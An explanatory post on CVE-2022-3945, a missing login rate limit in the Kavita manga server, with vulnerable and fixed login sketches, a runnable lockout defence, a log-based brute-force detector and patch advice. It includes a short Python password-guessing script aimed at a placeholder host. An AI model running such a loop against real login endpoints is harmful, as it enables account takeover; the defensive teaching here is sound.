What is CVE-2022-3945?
In late 2022, a security flaw was found in Kavita, an open-source self-hosted manga and comic server. If you were running any version prior to 0.6.0.3, your server was vulnerable to what is classified as CWE-307, “Improper Restriction of Excessive Authentication Attempts”.
Let’s break that down: Kavita did not limit how many times a client could submit a wrong password for an account, and it did not slow down or lock out a client that kept failing. In plain words, an attacker could hammer the login endpoint with password guesses for as long as they liked, which is exactly what a brute-force (or credential-stuffing) attack needs.
Why is This a Big Deal?
When a server allows unlimited login attempts, hackers can use automated tools to guess your password rapidly and repeatedly. Think of it like someone standing at your door with a list of thousands of keys, trying them all one after the other without you ever noticing. Eventually, they might just get in.
Brute-force attacks are one of the oldest tricks in the hacker playbook and are especially effective against accounts protected by weak or reused passwords.
Prior to the fix, the login logic in Kavita, simplified, looked something like this (conceptual C#, not the project’s actual source):
    // Before 0.6.0.3 - NO rate limiting, NO lockout
    public IActionResult Login(string username, string password)
    {
        var user = _userService.GetUserByUsername(username);
        // Compare the stored password hash with the hash of the submitted password
        if (user != null && user.Password == Hash(password))
        {
            // Successful login
            return Ok();
        }
        else
        {
            // Failed login: nothing is recorded, so the caller gets unlimited tries
            return Unauthorized();
        }
    }
There is no tracking of whether a user fails multiple times, and no control over the frequency of requests.
How Could an Attacker Exploit This?
An attacker could write a simple script to hammer away at the login API. Here’s a basic Python example, for educational purposes only; the host name and the exact login path are placeholders:
    import requests

    url = 'http://target-kavita-server.com/api/login'
    attempts = 0

    # One guess per line in the wordlist; nothing on the server side stops the loop
    with open('passwords.txt') as f:
        for password in f:
            password = password.strip()
            data = {'username': 'victim', 'password': password}
            response = requests.post(url, json=data)
            attempts += 1
            print(f"Attempt #{attempts}: {password} - Status: {response.status_code}")
            if response.status_code == 200:
                print("Password found:", password)
                break
Given enough tries and a good password list, the attacker could eventually break into a user account.
How Was It Fixed in Kavita?
In version 0.6.0.3, Kavita’s developers introduced rate limiting on authentication. Now, if the password check fails too many times in a short period, the app temporarily blocks or rate-limits further attempts instead of answering every guess.
A modern (and safer) version of the login code would look like this (conceptual example; the helper names are illustrative, not Kavita’s API):
    public IActionResult Login(string username, string password)
    {
        if (IsUserRateLimited(username))
        {
            return StatusCode(429); // Too Many Requests
        }
        if (!CredentialsValid(username, password))
        {
            RecordFailedAttempt(username); // this is what IsUserRateLimited consults
            return Unauthorized();
        }
        ResetFailedAttempts(username);     // a successful login clears the counter
        return Ok();
    }
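To make the conceptual check above concrete, here is a complete, runnable version of both controls in Python. This is an added example written for this post, not Kavita’s code (Kavita is an ASP.NET Core application and its real implementation differs); the class and helper names, the thresholds and the simulated attacker are all assumptions. It pairs a temporary per-account lockout after a number of consecutive failures with a per-source sliding-window budget, hashes the submitted password even when the username does not exist so that response timing does not reveal valid accounts, and replays the attacker loop from the exploit section to show it being cut off.

```python
"""Login throttling with account lockout and a per-source request budget.

Added example for this post, not Kavita's code. All names, thresholds and
the simulated attacker below are assumptions made here.
"""
import hashlib
import hmac
import secrets
import time
from collections import defaultdict, deque

MAX_FAILURES = 5        # consecutive failures before an account is locked
LOCKOUT_SECONDS = 300   # how long the lock lasts
IP_WINDOW_SECONDS = 60  # sliding window for the per-source budget
IP_MAX_ATTEMPTS = 20    # login attempts one source may make in that window

# Dummy salt/hash used when the username does not exist, so the failing path
# still performs a full password hash and timing does not reveal valid accounts.
_DUMMY_SALT = bytes(16)
_DUMMY_HASH = bytes(32)


def hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000)


class ManualClock:
    """Deterministic clock so the demo runs offline and reproducibly."""
    def __init__(self, start=1000.0):
        self.now = start

    def __call__(self):
        return self.now

    def advance(self, seconds):
        self.now += seconds


class LoginService:
    def __init__(self, clock=time.monotonic):
        self.clock = clock                        # injectable for testing
        self.users = {}                           # username -> (salt, hash)
        self.failures = defaultdict(int)          # username -> consecutive failures
        self.locked_until = {}                    # username -> unlock time
        self.ip_attempts = defaultdict(deque)     # ip -> attempt timestamps

    def register(self, username: str, password: str) -> None:
        salt = secrets.token_bytes(16)
        self.users[username] = (salt, hash_password(password, salt))

    def _source_budget_exceeded(self, ip: str) -> bool:
        now = self.clock()
        q = self.ip_attempts[ip]
        while q and now - q[0] > IP_WINDOW_SECONDS:
            q.popleft()                           # drop attempts outside the window
        if len(q) >= IP_MAX_ATTEMPTS:
            return True
        q.append(now)
        return False

    def login(self, username: str, password: str, ip: str):
        """Return (status, reason); status mirrors the HTTP code a controller would send."""
        if self._source_budget_exceeded(ip):
            return 429, "too many requests from this source"
        now = self.clock()
        if now < self.locked_until.get(username, 0):
            return 429, "account temporarily locked"
        record = self.users.get(username)
        salt, stored = record if record else (_DUMMY_SALT, _DUMMY_HASH)
        valid = record is not None and hmac.compare_digest(
            hash_password(password, salt), stored)
        if valid:
            self.failures.pop(username, None)     # success resets the counter
            self.locked_until.pop(username, None)
            return 200, "ok"
        self.failures[username] += 1
        if self.failures[username] >= MAX_FAILURES:
            self.locked_until[username] = now + LOCKOUT_SECONDS
            self.failures[username] = 0
        return 401, "invalid credentials"


def simulate_bruteforce(service, username, wordlist, ip="203.0.113.7"):
    """Replay the attacker loop from the exploit section against the hardened
    service. Returns (password_found_or_None, attempts_made, last_status)."""
    attempts = 0
    for guess in wordlist:
        status, _ = service.login(username, guess, ip)
        attempts += 1
        if status in (200, 429):
            return (guess if status == 200 else None), attempts, status
    return None, attempts, 401


if __name__ == "__main__":
    svc = LoginService(clock=ManualClock())
    svc.register("victim", "correct-horse-battery")
    wordlist = ["123456", "password", "qwerty", "letmein", "admin", "correct-horse-battery"]
    print(simulate_bruteforce(svc, "victim", wordlist))   # locked before the right guess
```

Two design points worth keeping in mind when porting this to a real server: a per-account lockout on its own lets an attacker lock the victim out of their own account by deliberately failing, which is why the per-source budget and a temporary rather than permanent lock are paired with it; and the in-memory counters here do not survive a restart or span multiple instances, so a production deployment keeps this state in the database or a shared cache.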
For Admins: Patch ASAP!
If you’re running Kavita on a version earlier than 0.6.0.3, update now: upgrading to 0.6.0.3 or later is the recommended fix. Until then, keep the server off the public internet or behind an authenticating reverse proxy, and make sure every account uses a strong, unique password.
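Updating is the fix, but an admin will also want to know whether anyone was hammering the login endpoint while the server was exposed. The following is an added example, not part of the original post and not Kavita’s code: it scans access-log lines from a reverse proxy placed in front of the server and flags any client IP that produced a burst of 401 responses on the login path inside a sliding window. The log lines are constructed here in Apache/nginx combined-log style, and the login path /api/login is taken from the attacker script above; Kavita’s own log format is not assumed.

```python
"""Detect login brute-force bursts in reverse-proxy access logs.

Added example for this post, not Kavita's code. The log lines are
constructed in combined-log style; Kavita's own log format is not assumed.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Combined-log prefix: client ip, identity, user, [timestamp], "METHOD PATH PROTO", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample: one source fires 12 failed logins in 33 seconds, a
# legitimate user mistypes once and then succeeds, and an unrelated GET.
SAMPLE_LINES = [
    f'203.0.113.7 - - [11/Nov/2022:12:00:{s:02d} +0000] "POST /api/login HTTP/1.1" 401 57'
    for s in range(0, 36, 3)
] + [
    '198.51.100.9 - - [11/Nov/2022:12:00:05 +0000] "POST /api/login HTTP/1.1" 401 57',
    '198.51.100.9 - - [11/Nov/2022:12:00:20 +0000] "POST /api/login HTTP/1.1" 200 312',
    '192.0.2.44 - - [11/Nov/2022:12:00:10 +0000] "GET /api/library HTTP/1.1" 200 2048',
]


def parse_line(line):
    """Return a dict with ip, ts (aware datetime), method, path, status, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"],
        "status": int(m["status"]),
    }


def find_bruteforce(lines, login_path="/api/login", window_s=60, threshold=10):
    """Map each client IP to the largest number of failed login POSTs it made
    within any window_s-second span, for IPs that reached `threshold`."""
    failures = [
        r for r in map(parse_line, lines)
        if r and r["method"] == "POST" and r["path"] == login_path and r["status"] == 401
    ]
    failures.sort(key=lambda r: r["ts"])   # log order is not guaranteed to be chronological
    windows = defaultdict(deque)
    flagged = {}
    for rec in failures:
        q = windows[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:
            q.popleft()                         # slide the window forward
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return flagged


if __name__ == "__main__":
    for ip, burst in find_bruteforce(SAMPLE_LINES).items():
        print(f"{ip}: {burst} failed logins within 60s")
```

A burst like the flagged one is a strong signal on a single-user or family server, where a handful of failed logins a day is the normal rate; tune `threshold` and `window_s` to your own baseline before wiring this into an alert.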
Reference Links
- Official Security Advisory (GHSA)
- NVD Details for CVE-2022-3945
- Kavita Changelog
- About Brute-Force Attacks (OWASP)
Summary
CVE-2022-3945 in Kavita was a risky flaw that let attackers make unlimited password guesses because the login endpoint had no lockout and no rate limiting. If you host this app, check your version right now and make sure you’re running 0.6.0.3 or a later, patched release.
Stay secure, use strong and unique passwords, and always keep your apps updated!
*This post is exclusive content created for educational purposes, simplifying security concepts for everyone’s understanding.*
Timeline
Published on: 11/11/2022 12:15:00 UTC
Last modified on: 11/16/2022 15:34:00 UTC